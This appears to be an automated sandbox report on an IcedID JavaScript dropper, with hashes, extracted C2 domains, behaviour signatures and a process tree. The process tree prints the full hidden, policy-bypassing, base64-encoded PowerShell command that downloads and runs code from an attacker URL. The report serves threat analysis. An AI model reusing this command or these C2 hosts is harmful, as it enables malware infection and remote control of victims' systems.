Analysis
-
max time kernel
135s -
max time network
139s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
16/03/2023, 18:01
Static task
static1
Behavioral task
behavioral1
Sample
Request_980387_March_16.js
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Request_980387_March_16.js
Resource
win10v2004-20230220-en
General
-
Target
Request_980387_March_16.js
-
Size
11KB
-
MD5
f7620e8393de1892407a64fd6c4fb37e
-
SHA1
27a75e63ca29e149d206e2b7649355d4663af36e
-
SHA256
ef80d34f4f1f4ff1d809848a3dc59f489ba8321f7835ba63760c1a44c0869c6b
-
SHA512
989965670351d5104b5d60386b8624ddf95d8ad36400eed35e639c4561e7a558c42501cc346028c9c20a8538d286b6cfb21fd7840d9a7142719a7db756934fd0
-
SSDEEP
192:0uX4cOkYAxdB2sBIiRsJRhI21/CG/E25k2tc6aqhJfSjW9uavQcLtRyUlml8naKM:1pOsdB24hajhspN2ebqhtSqrLmamliM
Malware Config
Extracted
http://aproshak.top/gatef1.php
Extracted
icedid
2171387498
avroralikhaem.com
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 4 1292 powershell.exe 5 1292 powershell.exe 7 904 rundll32.exe 9 904 rundll32.exe 10 904 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 1 IoCs
pid Process 904 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1292 powershell.exe 904 rundll32.exe 904 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1292 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1408 wrote to memory of 656 1408 wscript.exe 27 PID 1408 wrote to memory of 656 1408 wscript.exe 27 PID 1408 wrote to memory of 656 1408 wscript.exe 27 PID 656 wrote to memory of 1292 656 cmd.exe 29 PID 656 wrote to memory of 1292 656 cmd.exe 29 PID 656 wrote to memory of 1292 656 cmd.exe 29 PID 1292 wrote to memory of 904 1292 powershell.exe 30 PID 1292 wrote to memory of 904 1292 powershell.exe 30 PID 1292 wrote to memory of 904 1292 powershell.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Request_980387_March_16.js1⤵
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c pOwersHEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYQBwAHIAbwBzAGgAYQBrAC4AdABvAHAALwBnAGEAdABlAGYAMQAuAHAAaABwACIAKQA=2⤵
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepOwersHEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYQBwAHIAbwBzAGgAYQBrAC4AdABvAHAALwBnAGEAdABlAGYAMQAuAHAAaABwACIAKQA=3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\NziXYd.dat init4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:904
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
425KB
MD547fc7775d368ebe67b4b27c7913a4e11
SHA13f6fe6225400285a0e05950dfabae9a6ba858ed3
SHA2568bef7c5f74640080536d669c15629c4c720bc081c1f72505eed8c3b87fd5f915
SHA5129534c47ee2738e3000489a9df2bd8bda64c7c9b5459e70c9b3e1dbacfc6a7bb00884f845290aa7f361e03ff68409ba1839d9748453b46ae0beb0da04a8ad6a2f
-
Filesize
425KB
MD547fc7775d368ebe67b4b27c7913a4e11
SHA13f6fe6225400285a0e05950dfabae9a6ba858ed3
SHA2568bef7c5f74640080536d669c15629c4c720bc081c1f72505eed8c3b87fd5f915
SHA5129534c47ee2738e3000489a9df2bd8bda64c7c9b5459e70c9b3e1dbacfc6a7bb00884f845290aa7f361e03ff68409ba1839d9748453b46ae0beb0da04a8ad6a2f